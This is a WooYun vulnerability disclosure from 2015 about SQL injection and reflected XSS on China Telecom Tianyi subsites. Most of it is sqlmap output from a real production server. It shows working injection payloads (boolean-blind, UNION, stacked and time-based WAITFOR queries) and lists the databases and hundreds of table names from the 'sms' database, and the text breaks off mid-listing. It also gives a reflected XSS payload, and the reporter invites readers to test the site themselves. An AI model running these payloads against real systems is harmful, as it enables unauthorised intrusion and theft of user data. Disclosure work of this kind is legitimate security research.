当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138714

漏洞标题:中国电信天翼某分站存在多处注入 (DBA权限都有哦!)

相关厂商:中国电信

漏洞作者: 陆由乙

提交时间:2015-09-08 15:52

修复时间:2015-10-25 17:36

公开时间:2015-10-25 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-10: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-20: 细节向核心白帽子及相关领域专家公开
2015-09-30: 细节向普通白帽子公开
2015-10-10: 细节向实习白帽子公开
2015-10-25: 细节向公众公开

简要描述:

这个涉及两个天翼站点,一个河北的,一个赣江的。
求高rank。

详细说明:

**.**.**.**/sms/mms/jsp/kind.jsp?code=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&name=%E7%94%9F%E6%97%A5%E5%BD%A9%E4%BF%A1
反射XSS
**.**.**.**/sms/sms/jsp/ncSms.jsp?typeid=1110
**.**.**.**/sms/mms/jsp/detail.jsp?id=2904
反正这个站点注入不少,自测把。
sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2904 AND 3872=3872
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=2904 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR
(120)+CHAR(113)+CHAR(110)+CHAR(108)+CHAR(66)+CHAR(119)+CHAR(67)+CHAR(104)+CHAR(1
08)+CHAR(110)+CHAR(100)+CHAR(70)+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(120)+CHAR(11
3),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=2904; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=2904 WAITFOR DELAY '0:0:5'--
---
[17:49:40] [INFO] testing Microsoft SQL Server
[17:49:40] [INFO] confirming Microsoft SQL Server
[17:49:41] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[17:49:41] [INFO] fetching database names
[17:49:42] [INFO] the SQL query used returns 6 entries
[17:49:42] [INFO] retrieved: master
[17:49:43] [INFO] retrieved: model
[17:49:43] [INFO] retrieved: msdb
[17:49:43] [INFO] retrieved: sms
[17:49:44] [INFO] retrieved: spsms
[17:49:44] [INFO] retrieved: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] sms
[*] spsms
[*] tempdb
>>1.txt
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150412}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:52:07
[17:52:07] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:52:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2904 AND 3872=3872
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=2904 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(110)+CHAR(108)+CHAR(66)+CHAR(119)+CHAR(67)+CHAR(104)+CHAR(108)+CHAR(110)+CHAR(100)+CHAR(70)+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=2904; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=2904 WAITFOR DELAY '0:0:5'--
---
[17:52:07] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[17:52:07] [INFO] fetching tables for database: sms
[17:52:08] [WARNING] reflective value(s) found and filtering out
[17:52:08] [INFO] the SQL query used returns 648 entries
[17:52:08] [INFO] retrieved: dbo.a1025a
[17:52:08] [INFO] retrieved: dbo.a10311a
[17:52:09] [INFO] retrieved: dbo.aaaa
[17:52:09] [INFO] retrieved: dbo.area_wbsh
[17:52:10] [INFO] retrieved: dbo.award_list
[17:52:10] [INFO] retrieved: dbo.award_send
[17:52:10] [INFO] retrieved: dbo.award_type
[17:52:11] [INFO] retrieved: dbo.awardCJ
[17:52:11] [INFO] retrieved: dbo.back_user
[17:52:12] [INFO] retrieved: dbo.buyXN
[17:52:12] [INFO] retrieved: dbo.bx_type
[17:52:13] [INFO] retrieved: dbo.ce
[17:52:13] [INFO] retrieved: dbo.cjnum
[17:52:13] [INFO] retrieved: dbo.cjqkb
[17:52:14] [INFO] retrieved: dbo.cjResult
[17:52:14] [INFO] retrieved: dbo.ct_BlackList_user
[17:52:15] [INFO] retrieved: dbo.ct_BlackList_user
[17:52:15] [INFO] retrieved: dbo.ct_csv2sql_db
[17:52:16] [INFO] retrieved: dbo.ct_hd_000_TB
[17:52:16] [INFO] retrieved: dbo.ct_hd_000_z101_log
[17:52:16] [INFO] retrieved: dbo.ct_hd_000_z101_question
[17:52:17] [INFO] retrieved: dbo.ct_hd_000_z105_log
[17:52:17] [INFO] retrieved: dbo.ct_hd_000_z105_pn
[17:52:18] [INFO] retrieved: dbo.ct_hd_000_z105_pv
[17:52:18] [INFO] retrieved: dbo.ct_hd_000_z106_log
[17:52:18] [INFO] retrieved: dbo.ct_hd_000_z108_log
[17:52:19] [INFO] retrieved: dbo.ct_hd_000_z108_question
[17:52:19] [INFO] retrieved: dbo.ct_hd_000_z109_JiangPing
[17:52:20] [INFO] retrieved: dbo.ct_hd_000_z109_km
[17:52:20] [INFO] retrieved: dbo.ct_hd_000_z109_log
[17:52:20] [INFO] retrieved: dbo.ct_hd_000_z109_pn
[17:52:21] [INFO] retrieved: dbo.ct_hd_000_z109_pv
[17:52:21] [INFO] retrieved: dbo.ct_hd_000_z119_log
[17:52:22] [INFO] retrieved: dbo.ct_hd_000_z121_log
[17:52:23] [INFO] retrieved: dbo.ct_hd_000_z121_question
[17:52:23] [INFO] retrieved: dbo.ct_hd_000_z124_log
[17:52:23] [INFO] retrieved: dbo.ct_hd_000_z124_question
[17:52:24] [INFO] retrieved: dbo.ct_hd_000_z127_km
[17:52:24] [INFO] retrieved: dbo.ct_hd_000_z138_log
[17:52:25] [INFO] retrieved: dbo.ct_hd_000_z138_question
[17:52:25] [INFO] retrieved: dbo.ct_hd_000_z140_inf
[17:52:25] [INFO] retrieved: dbo.ct_hd_000_z140_km300
[17:52:26] [INFO] retrieved: dbo.ct_hd_000_z140_km500
[17:52:26] [INFO] retrieved: dbo.ct_hd_000_z140_log
[17:52:27] [INFO] retrieved: dbo.ct_hd_000_z141_log
[17:52:27] [INFO] retrieved: dbo.ct_hd_000_z145_inf
[17:52:27] [INFO] retrieved: dbo.ct_hd_000_z145_km
[17:52:28] [INFO] retrieved: dbo.ct_hd_000_z145_log
[17:52:28] [INFO] retrieved: dbo.ct_hd_000_z145_pn
[17:52:28] [INFO] retrieved: dbo.ct_hd_000_z146_pn
[17:52:29] [INFO] retrieved: dbo.ct_hd_000_z150_log
[17:52:29] [INFO] retrieved: dbo.ct_hd_000_z1501_pn
[17:52:30] [INFO] retrieved: dbo.ct_hd_000_z1502_pn
[17:52:30] [INFO] retrieved: dbo.ct_hd_000_z1502_timespan
[17:52:30] [INFO] retrieved: dbo.ct_hd_000_z1503_card
[17:52:31] [INFO] retrieved: dbo.ct_hd_000_z1503_log
[17:52:31] [INFO] retrieved: dbo.ct_hd_000_z1503_pn
[17:52:31] [INFO] retrieved: dbo.ct_hd_000_z1519_cailing
[17:52:32] [INFO] retrieved: dbo.ct_hd_000_z1519_log
[17:52:32] [INFO] retrieved: dbo.ct_hd_000_z155_inf
[17:52:32] [INFO] retrieved: dbo.ct_hd_000_z155_log
[17:52:33] [INFO] retrieved: dbo.ct_hd_000_z155_pn
[17:52:33] [INFO] retrieved: dbo.ct_hd_000_z160_pv
[17:52:33] [INFO] retrieved: dbo.ct_hd_000_z163_log
[17:52:34] [INFO] retrieved: dbo.ct_hd_000_z165_log
[17:52:34] [INFO] retrieved: dbo.ct_hd_000_z166_log
[17:52:34] [INFO] retrieved: dbo.ct_hd_000_z166_pn
[17:52:35] [INFO] retrieved: dbo.ct_hd_000_z172_log
[17:52:35] [INFO] retrieved: dbo.ct_hd_000_z178_info
[17:52:35] [INFO] retrieved: dbo.ct_hd_000_z178_log
[17:52:36] [INFO] retrieved: dbo.ct_hd_000_z181_cjlog
[17:52:36] [INFO] retrieved: dbo.ct_hd_000_z181_dglog
[17:52:36] [INFO] retrieved: dbo.ct_hd_000_z181_pn20140702
[17:52:37] [INFO] retrieved: dbo.ct_hd_000_z181_pn20140702
[17:52:37] [INFO] retrieved: dbo.ct_hd_000_z181_pv
[17:52:37] [INFO] retrieved: dbo.ct_hd_000_z181KM
[17:52:38] [INFO] retrieved: dbo.ct_hd_000_z200_log
[17:52:38] [INFO] retrieved: dbo.ct_hd_000_z200_tp
[17:52:38] [INFO] retrieved: dbo.ct_hd_000_z200_user
[17:52:39] [INFO] retrieved: dbo.ct_hd_000_z200_yue
[17:52:39] [INFO] retrieved: dbo.ct_hd_000_z200_zy
[17:52:39] [INFO] retrieved: dbo.ct_hd_000_z202_cjlog
[17:52:40] [INFO] retrieved: dbo.ct_hd_000_z202_DG
[17:52:40] [INFO] retrieved: dbo.ct_hd_000_z202_log
[17:52:40] [INFO] retrieved: dbo.ct_hd_000_z202_user
[17:52:41] [INFO] retrieved: dbo.ct_hd_000_z202KM
[17:52:41] [INFO] retrieved: dbo.ct_hd_000_z204_log
[17:52:41] [INFO] retrieved: dbo.ct_hd_000_z205_qd
[17:52:42] [INFO] retrieved: dbo.ct_hd_000_z206_Options
[17:52:42] [INFO] retrieved: dbo.ct_hd_000_z206_Options
[17:52:43] [INFO] retrieved: dbo.ct_hd_000_z31_log
[17:52:43] [INFO] retrieved: dbo.ct_hd_000_z31_question
[17:52:43] [INFO] retrieved: dbo.ct_hd_000_z33_log
[17:52:44] [INFO] retrieved: dbo.ct_hd_000_z33_pn
[17:52:44] [INFO] retrieved: dbo.ct_hd_000_z33_tests
[17:52:44] [INFO] retrieved: dbo.ct_hd_000_z36_log
[17:52:45] [INFO] retrieved: dbo.ct_hd_000_z36_pn
[17:52:45] [INFO] retrieved: dbo.ct_hd_000_z36_rd
[17:52:46] [INFO] retrieved: dbo.ct_hd_000_z44_cx_JiangPing
[17:52:46] [INFO] retrieved: dbo.ct_hd_000_z44_cx_log
[17:52:46] [INFO] retrieved: dbo.ct_hd_000_z44_cx_pn
[17:52:47] [INFO] retrieved: dbo.ct_hd_000_z44_cx_pv
[17:52:47] [INFO] retrieved: dbo.ct_hd_000_z44_km
[17:52:48] [INFO] retrieved: dbo.ct_hd_000_z44_ll_JiangPing
[17:52:48] [INFO] retrieved: dbo.ct_hd_000_z44_ll_log
[17:52:48] [INFO] retrieved: dbo.ct_hd_000_z44_ll_pn
[17:52:49] [INFO] retrieved: dbo.ct_hd_000_z44_ll_pv
[17:52:49] [INFO] retrieved: dbo.ct_hd_000_z45_log
[17:52:50] [INFO] retrieved: dbo.ct_hd_000_z47_JiangPing
[17:52:50] [INFO] retrieved: dbo.ct_hd_000_z47_log
[17:52:50] [INFO] retrieved: dbo.ct_hd_000_z47_pn
[17:52:51] [INFO] retrieved: dbo.ct_hd_000_z47_sms_JiangPing
[17:52:51] [INFO] retrieved: dbo.ct_hd_000_z47_sms_log
[17:52:52] [INFO] retrieved: dbo.ct_hd_000_z48_log
[17:52:52] [INFO] retrieved: dbo.ct_hd_000_z48_pv
[17:52:53] [INFO] retrieved: dbo.ct_hd_000_z50_down
[17:52:53] [INFO] retrieved: dbo.ct_hd_000_z50_JiangPing
[17:52:53] [INFO] retrieved: dbo.ct_hd_000_z50_log
[17:52:54] [INFO] retrieved: dbo.ct_hd_000_z50_pn
[17:52:54] [INFO] retrieved: dbo.ct_hd_000_z50_pv
[17:52:55] [INFO] retrieved: dbo.ct_hd_000_z51_JiangPing
[17:52:55] [INFO] retrieved: dbo.ct_hd_000_z51_log
[17:52:55] [INFO] retrieved: dbo.ct_hd_000_z51_pn
[17:52:56] [INFO] retrieved: dbo.ct_hd_000_z51_pv
[17:52:56] [INFO] retrieved: dbo.ct_hd_000_z51_urls
[17:52:57] [INFO] retrieved: dbo.ct_hd_000_z54_JiangPing
[17:52:57] [INFO] retrieved: dbo.ct_hd_000_z54_log
[17:52:57] [INFO] retrieved: dbo.ct_hd_000_z54_pn
[17:52:58] [INFO] retrieved: dbo.ct_hd_000_z54_pv
[17:52:58] [INFO] retrieved: dbo.ct_hd_000_z54_urls
[17:52:59] [INFO] retrieved: dbo.ct_hd_000_z55_log
[17:52:59] [INFO] retrieved: dbo.ct_hd_000_z55_question
[17:53:00] [INFO] retrieved: dbo.ct_hd_000_z69_app
[17:53:00] [INFO] retrieved: dbo.ct_hd_000_z69_log
[17:53:00] [INFO] retrieved: dbo.ct_hd_000_z69_user
[17:53:01] [INFO] retrieved: dbo.ct_hd_000_z71_Store
[17:53:01] [INFO] retrieved: dbo.ct_hd_000_z71_urls
[17:53:02] [INFO] retrieved: dbo.ct_hd_000_z74_pn_temp
[17:53:02] [INFO] retrieved: dbo.ct_hd_000_z74_pn_temp
[17:53:02] [INFO] retrieved: dbo.ct_hd_000_z82_app
[17:53:03] [INFO] retrieved: dbo.ct_hd_000_z82_JiangPing
[17:53:03] [INFO] retrieved: dbo.ct_hd_000_z82_km
[17:53:04] [INFO] retrieved: dbo.ct_hd_000_z82_log
[17:53:04] [INFO] retrieved: dbo.ct_hd_000_z82_pn
[17:53:04] [INFO] retrieved: dbo.ct_hd_000_z82_pv
[17:53:05] [INFO] retrieved: dbo.ct_hd_000_z90_pn_temp
[17:53:05] [INFO] retrieved: dbo.ct_hd_000_z90_pn_temp
[17:53:06] [INFO] retrieved: dbo.ct_hd_000_z91_log
[17:53:06] [INFO] retrieved: dbo.ct_hd_000_z91_sr
[17:53:06] [INFO] retrieved: dbo.ct_hd_000_Z92_3gp
[17:53:07] [INFO] retrieved: dbo.ct_hd_000_z92_km
[17:53:07] [INFO] retrieved: dbo.ct_hd_000_Z92_log
[17:53:08] [INFO] retrieved: dbo.ct_hd_000_Z92_pn
[17:53:08] [INFO] retrieved: dbo.ct_hd_000_z92_pv
[17:53:08] [INFO] retrieved: dbo.ct_hd_000_z92_SpPingLun
[17:53:09] [INFO] retrieved: dbo.ct_hd_000_Z92_SpZhuanFa
[17:53:09] [INFO] retrieved: dbo.ct_hd_000_z92_TpPingLun
[17:53:10] [INFO] retrieved: dbo.ct_hd_000_z92_TpZhuanFa
[17:53:10] [INFO] retrieved: dbo.ct_hd_000_z97_log
[17:53:10] [INFO] retrieved: dbo.ct_hd_0310_z300_log
[17:53:11] [INFO] retrieved: dbo.ct_hd_310_z110_log
[17:53:11] [INFO] retrieved: dbo.ct_hd_310_z110_pn
[17:53:12] [INFO] retrieved: dbo.ct_hd_310_z128_log
[17:53:12] [INFO] retrieved: dbo.ct_hd_310_z130_log
[17:53:12] [INFO] retrieved: dbo.ct_hd_310_z130_question
[17:53:13] [INFO] retrieved: dbo.ct_hd_310_z134_km
[17:53:13] [INFO] retrieved: dbo.ct_hd_310_z134_log
[17:53:14] [INFO] retrieved: dbo.ct_hd_310_z139_log
[17:53:14] [INFO] retrieved: dbo.ct_hd_310_z139_pn
[17:53:14] [INFO] retrieved: dbo.ct_hd_310_z149_log
[17:53:15] [INFO] retrieved: dbo.ct_hd_310_z161_log
[17:53:15] [INFO] retrieved: dbo.ct_hd_310_z161_pn
[17:53:16] [INFO] retrieved: dbo.ct_hd_310_z162_log
[17:53:16] [INFO] retrieved: dbo.ct_hd_310_z162_pn
[17:53:17] [INFO] retrieved: dbo.ct_hd_310_z166_log
[17:53:17] [INFO] retrieved: dbo.ct_hd_310_z169_log
[17:53:17] [INFO] retrieved: dbo.ct_hd_310_z169_pn
[17:53:18] [INFO] retrieved: dbo.ct_hd_310_z200_check
[17:53:18] [INFO] retrieved: dbo.ct_hd_310_z200_log
[17:53:19] [INFO] retrieved: dbo.ct_hd_310_z27_log
[17:53:19] [INFO] retrieved: dbo.ct_hd_310_z30_JiangPing
[17:53:19] [INFO] retrieved: dbo.ct_hd_310_z30_log
[17:53:20] [INFO] retrieved: dbo.ct_hd_310_z30_pn
[17:53:20] [INFO] retrieved: dbo.ct_hd_310_z30_pv
[17:53:21] [INFO] retrieved: dbo.ct_hd_310_z57_log
[17:53:21] [INFO] retrieved: dbo.ct_hd_310_z57_pn
[17:53:21] [INFO] retrieved: dbo.ct_hd_310_z99_duihuan
[17:53:22] [INFO] retrieved: dbo.ct_hd_310_z99_JiangPing
[17:53:22] [INFO] retrieved: dbo.ct_hd_310_z99_log
[17:53:23] [INFO] retrieved: dbo.ct_hd_310_z99_pn
[17:53:23] [INFO] retrieved: dbo.ct_hd_310_z99_pv
[17:53:23] [INFO] retrieved: dbo.ct_hd_311_z29_JiangPing
[17:53:24] [INFO] retrieved: dbo.ct_hd_311_z29_log
[17:53:24] [INFO] retrieved: dbo.ct_hd_311_z29_pn
[17:53:25] [INFO] retrieved: dbo.ct_hd_311_z34_choujianglog
[17:53:25] [INFO] retrieved: dbo.ct_hd_311_z34_hd1log
[17:53:25] [INFO] retrieved: dbo.ct_hd_311_z34_hd2log
[17:53:26] [INFO] retrieved: dbo.ct_hd_311_z34_hd3log_log
[17:53:26] [INFO] retrieved: dbo.ct_hd_311_z34_hd3log_log
[17:53:27] [INFO] retrieved: dbo.ct_hd_311_z34_hd4log
[17:53:27] [INFO] retrieved: dbo.ct_hd_311_z34_hd5log_log
[17:53:27] [INFO] retrieved: dbo.ct_hd_311_z34_hd5log_log
[17:53:28] [INFO] retrieved: dbo.ct_hd_311_z34_hd6log_log
[17:53:28] [INFO] retrieved: dbo.ct_hd_311_z34_hd6log_log
[17:53:29] [INFO] retrieved: dbo.ct_hd_311_z34_JiangPing
[17:53:29] [INFO] retrieved: dbo.ct_hd_311_z34_log
[17:53:29] [INFO] retrieved: dbo.ct_hd_311_z34_pn
[17:53:30] [INFO] retrieved: dbo.ct_hd_311_z34_pv
[17:53:30] [INFO] retrieved: dbo.ct_hd_311_z43_cl
[17:53:30] [INFO] retrieved: dbo.ct_hd_311_z43_cm
[17:53:31] [INFO] retrieved: dbo.ct_hd_311_z43_mms
[17:53:31] [INFO] retrieved: dbo.ct_hd_311_z43_pv
[17:53:31] [INFO] retrieved: dbo.ct_hd_311_z43_sms
[17:53:32] [INFO] retrieved: dbo.ct_hd_312_z114_log
[17:53:32] [INFO] retrieved: dbo.ct_hd_312_z114_pn
[17:53:33] [INFO] retrieved: dbo.ct_hd_312_z115_log
[17:53:33] [INFO] retrieved: dbo.ct_hd_312_z180_log
[17:53:33] [INFO] retrieved: dbo.ct_hd_312_z98_log
[17:53:34] [INFO] retrieved: dbo.ct_hd_312_z98_pn
[17:53:34] [INFO] retrieved: dbo.ct_hd_313_120517_shoujishangwang
[17:53:34] [INFO] retrieved: dbo.ct_hd_313_z104_JiangPing
[17:53:35] [INFO] retrieved: dbo.ct_hd_313_z104_link
[17:53:35] [INFO] retrieved: dbo.ct_hd_313_z104_log
[17:53:35] [INFO] retrieved: dbo.ct_hd_313_z104_pn
[17:53:36] [INFO] retrieved: dbo.ct_hd_313_z104_pv
[17:53:36] [INFO] retrieved: dbo.ct_hd_313_z142_log
[17:53:36] [INFO] retrieved: dbo.ct_hd_313_z142_pv
[17:53:37] [INFO] retrieved: dbo.ct_hd_313_z142_xiazai
[17:53:37] [INFO] retrieved: dbo.ct_hd_313_z143_jiangpin
[17:53:38] [INFO] retrieved: dbo.ct_hd_313_z143_km
[17:53:38] [INFO] retrieved: dbo.ct_hd_313_z143_log
[17:53:38] [INFO] retrieved: dbo.ct_hd_313_z143_pn
[17:53:39] [INFO] retrieved: dbo.ct_hd_313_z143_pv
[17:53:39] [INFO] retrieved: dbo.ct_hd_313_z38_JiangPing
[17:53:39] [INFO] retrieved: dbo.ct_hd_313_z38_log
[17:53:40] [INFO] retrieved: dbo.ct_hd_313_z38_pn
[17:53:40] [INFO] retrieved: dbo.ct_hd_313_z38_pv
[17:53:40] [INFO] retrieved: dbo.ct_hd_314_z103_JiangPing
[17:53:41] [INFO] retrieved: dbo.ct_hd_314_z103_log
[17:53:41] [INFO] retrieved: dbo.ct_hd_314_z103_pn
[17:53:41] [INFO] retrieved: dbo.ct_hd_314_z103_pv
[17:53:42] [INFO] retrieved: dbo.ct_hd_314_z131_log
[17:53:42] [INFO] retrieved: dbo.ct_hd_314_z131_pn
[17:53:43] [INFO] retrieved: dbo.ct_hd_314_z131_pv
[17:53:43] [INFO] retrieved: dbo.ct_hd_314_z144_jiangpin
[17:53:43] [INFO] retrieved: dbo.ct_hd_314_z144_log
[17:53:44] [INFO] retrieved: dbo.ct_hd_314_z144_pn
[17:53:45] [INFO] retrieved: dbo.ct_hd_314_z144_pv
[17:53:46] [INFO] retrieved: dbo.ct_hd_314_z157_pn
[17:53:46] [INFO] retrieved: dbo.ct_hd_314_z157_pv
[17:53:46] [INFO] retrieved: dbo.ct_hd_314_z168_inf
[17:53:47] [INFO] retrieved: dbo.ct_hd_314_z168_pn
[17:53:47] [INFO] retrieved: dbo.ct_hd_314_z168_pv
[17:53:47] [INFO] retrieved: dbo.ct_hd_314_z21_JiangPing
[17:53:48] [INFO] retrieved: dbo.ct_hd_314_z21_log
[17:53:48] [INFO] retrieved: dbo.ct_hd_314_z21_pn
[17:53:49] [INFO] retrieved: dbo.ct_hd_314_z39_JiangPing
[17:53:49] [INFO] retrieved: dbo.ct_hd_314_z39_log
[17:53:49] [INFO] retrieved: dbo.ct_hd_314_z39_pn
[17:53:50] [INFO] retrieved: dbo.ct_hd_314_z39_pv
[17:53:50] [INFO] retrieved: dbo.ct_hd_315_z122_pv
[17:53:50] [INFO] retrieved: dbo.ct_hd_315_z132_spbflog
[17:53:51] [INFO] retrieved: dbo.ct_hd_315_z132_sppl
[17:53:51] [INFO] retrieved: dbo.ct_hd_315_z132_toupiao
[17:53:51] [INFO] retrieved: dbo.ct_hd_315_z132_video
[17:53:52] [INFO] retrieved: dbo.ct_hd_315_z133_inf
[17:53:52] [INFO] retrieved: dbo.ct_hd_315_z133_log
[17:53:52] [INFO] retrieved: dbo.ct_hd_315_z133_pinglun
[17:53:53] [INFO] retrieved: dbo.ct_hd_315_z147_km
[17:53:53] [INFO] retrieved: dbo.ct_hd_315_z147_pv
[17:53:53] [INFO] retrieved: dbo.ct_hd_315_z176_inf
[17:53:54] [INFO] retrieved: dbo.ct_hd_315_z176_log
[17:53:54] [INFO] retrieved: dbo.ct_hd_315_z179_log
[17:53:55] [INFO] retrieved: dbo.ct_hd_315_z179_pn
[17:53:55] [INFO] retrieved: dbo.ct_hd_315_z200_inf_1
[17:53:55] [INFO] retrieved: dbo.ct_hd_315_z200_inf_1
[17:53:56] [INFO] retrieved: dbo.ct_hd_315_z200_log_1
[17:53:56] [INFO] retrieved: dbo.ct_hd_315_z200_log_1
[17:53:56] [INFO] retrieved: dbo.ct_hd_315_z49_JiangPing
[17:53:57] [INFO] retrieved: dbo.ct_hd_315_z49_log
[17:53:57] [INFO] retrieved: dbo.ct_hd_315_z49_pn
[17:53:57] [INFO] retrieved: dbo.ct_hd_315_z49_pv
[17:53:58] [INFO] retrieved: dbo.ct_hd_315_z68_JiangPing
[17:53:58] [INFO] retrieved: dbo.ct_hd_315_z68_log
[17:53:59] [INFO] retrieved: dbo.ct_hd_315_z68_pn
[17:53:59] [INFO] retrieved: dbo.ct_hd_315_z68_pv
[17:53:59] [INFO] retrieved: dbo.ct_hd_315_z84_Admin
[17:54:00] [INFO] retrieved: dbo.ct_hd_315_z84_AdminType
[17:54:00] [INFO] retrieved: dbo.ct_hd_315_z84_HuoDong
[17:54:00] [INFO] retrieved: dbo.ct_hd_315_z84_QuXian
[17:54:01] [INFO] retrieved: dbo.ct_hd_315_z84_ShenHe
[17:54:01] [INFO] retrieved: dbo.ct_hd_315_z84_WangDianLeiBie
[17:54:01] [INFO] retrieved: dbo.ct_hd_315_z84_WangDianLeiBie
[17:54:02] [INFO] retrieved: dbo.ct_hd_315_z84_XiXiang
[17:54:02] [INFO] retrieved: dbo.ct_hd_316_z102_log
[17:54:02] [INFO] retrieved: dbo.ct_hd_316_z102_video
[17:54:03] [INFO] retrieved: dbo.ct_hd_316_z167_log2
[17:54:03] [INFO] retrieved: dbo.ct_hd_316_z167_log2
[17:54:03] [INFO] retrieved: dbo.ct_hd_316_z167_pn150
[17:54:04] [INFO] retrieved: dbo.ct_hd_316_z167_pn150
[17:54:04] [INFO] retrieved: dbo.ct_hd_316_z167_pn300
[17:54:04] [INFO] retrieved: dbo.ct_hd_316_z167_pn500
[17:54:05] [INFO] retrieved: dbo.ct_hd_316_z167_pn800
[17:54:05] [INFO] retrieved: dbo.ct_hd_316_z173_log
[17:54:06] [INFO] retrieved: dbo.ct_hd_316_z173_pn
[17:54:06] [INFO] retrieved: dbo.ct_hd_316_z24_JiangPing
[17:54:06] [INFO] retrieved: dbo.ct_hd_316_z24_kami
[17:54:07] [INFO] retrieved: dbo.ct_hd_316_z24_log
[17:54:07] [INFO] retrieved: dbo.ct_hd_316_z24_pn
[17:54:07] [INFO] retrieved: dbo.ct_hd_316_z40_JiangPing
[17:54:08] [INFO] retrieved: dbo.ct_hd_316_z40_km
[17:54:08] [INFO] retrieved: dbo.ct_hd_316_z40_log
[17:54:08] [INFO] retrieved: dbo.ct_hd_316_z40_pn
[17:54:09] [INFO] retrieved: dbo.ct_hd_316_z40_pv
[17:54:09] [INFO] retrieved: dbo.ct_hd_316_z41_JiangPing
[17:54:10] [INFO] retrieved: dbo.ct_hd_316_z41_km
[17:54:10] [INFO] retrieved: dbo.ct_hd_316_z41_log
[17:54:10] [INFO] retrieved: dbo.ct_hd_316_z41_pn
[17:54:11] [INFO] retrieved: dbo.ct_hd_316_z41_pv
[17:54:11] [INFO] retrieved: dbo.ct_hd_316_z89_km
[17:54:11] [INFO] retrieved: dbo.ct_hd_316_z89_log
[17:54:12] [INFO] retrieved: dbo.ct_hd_316_z89_pn
[17:54:12] [INFO] retrieved: dbo.ct_hd_317_z117_JiangPing
[17:54:12] [INFO] retrieved: dbo.ct_hd_317_z117_log
[17:54:13] [INFO] retrieved: dbo.ct_hd_317_z117_pn
[17:54:13] [INFO] retrieved: dbo.ct_hd_317_z117_pv
[17:54:14] [INFO] retrieved: dbo.ct_hd_317_z148_flag
[17:54:14] [INFO] retrieved: dbo.ct_hd_317_z148_log
[17:54:14] [INFO] retrieved: dbo.ct_hd_317_z148_question_old
[17:54:15] [INFO] retrieved: dbo.ct_hd_317_z148_question_old
[17:54:15] [INFO] retrieved: dbo.ct_hd_317_z156_inf
[17:54:16] [INFO] retrieved: dbo.ct_hd_317_z156_jflog
[17:54:16] [INFO] retrieved: dbo.ct_hd_317_z156_jiangpin
[17:54:16] [INFO] retrieved: dbo.ct_hd_317_z156_log
[17:54:17] [INFO] retrieved: dbo.ct_hd_317_z156_pv
[17:54:17] [INFO] retrieved: dbo.ct_hd_317_z158_log
[17:54:17] [INFO] retrieved: dbo.ct_hd_317_z34_choujianglog
[17:54:18] [INFO] retrieved: dbo.ct_hd_317_z34_hd1log
[17:54:18] [INFO] retrieved: dbo.ct_hd_317_z34_hd2log
[17:54:18] [INFO] retrieved: dbo.ct_hd_317_z34_hd3log_log
[17:54:19] [INFO] retrieved: dbo.ct_hd_317_z34_hd3log_log
[17:54:19] [INFO] retrieved: dbo.ct_hd_317_z34_hd4log
[17:54:19] [INFO] retrieved: dbo.ct_hd_317_z34_hd5log_log
[17:54:20] [INFO] retrieved: dbo.ct_hd_317_z34_hd5log_log
[17:54:20] [INFO] retrieved: dbo.ct_hd_317_z34_hd6log_log
[17:54:20] [INFO] retrieved: dbo.ct_hd_317_z34_hd6log_log
[17:54:21] [INFO] retrieved: dbo.ct_hd_317_z34_JiangPing
[17:54:21] [INFO] retrieved: dbo.ct_hd_317_z34_log
[17:54:22] [INFO] retrieved: dbo.ct_hd_317_z34_pn
[17:54:22] [INFO] retrieved: dbo.ct_hd_317_z34_pv
[17:54:22] [INFO] retrieved: dbo.ct_hd_317_z37_JiangPing
[17:54:23] [INFO] retrieved: dbo.ct_hd_317_z37_log
[17:54:24] [INFO] retrieved: dbo.ct_hd_317_z37_pn
[17:54:24] [INFO] retrieved: dbo.ct_hd_317_z37_pv
[17:54:24] [INFO] retrieved: dbo.ct_hd_318_z151_log
[17:54:25] [INFO] retrieved: dbo.ct_hd_318_z152_log
[17:54:25] [INFO] retrieved: dbo.ct_hd_318_z164_inf
[17:54:25] [INFO] retrieved: dbo.ct_hd_318_z164_log
